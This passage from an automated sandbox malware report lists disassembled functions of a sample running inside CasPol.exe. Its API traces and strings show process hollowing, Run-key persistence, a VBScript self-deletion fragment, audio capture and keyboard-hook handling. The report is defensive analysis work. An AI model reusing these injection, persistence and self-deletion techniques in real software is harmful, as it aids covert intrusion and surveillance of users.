                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                            • API String ID: 4188446516-3035715614
                                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                            Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                            • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                            • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                            Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                            • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                            • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                            Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                            • Opcode ID: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                            • Opcode Fuzzy Hash: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                            Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                            • API String ID: 738084811-1408154895
                                                                                                            • Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                            • Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                            Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Write$Create
                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                            Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                            • API String ID: 1646373207-165202446
                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                            Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                            • API String ID: 1579085052-1280438975
                                                                                                            • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                            • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                            Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                            • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                            • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                            Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899193279-0
                                                                                                            • Opcode ID: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                            • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                            • Opcode Fuzzy Hash: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                            • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                            Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
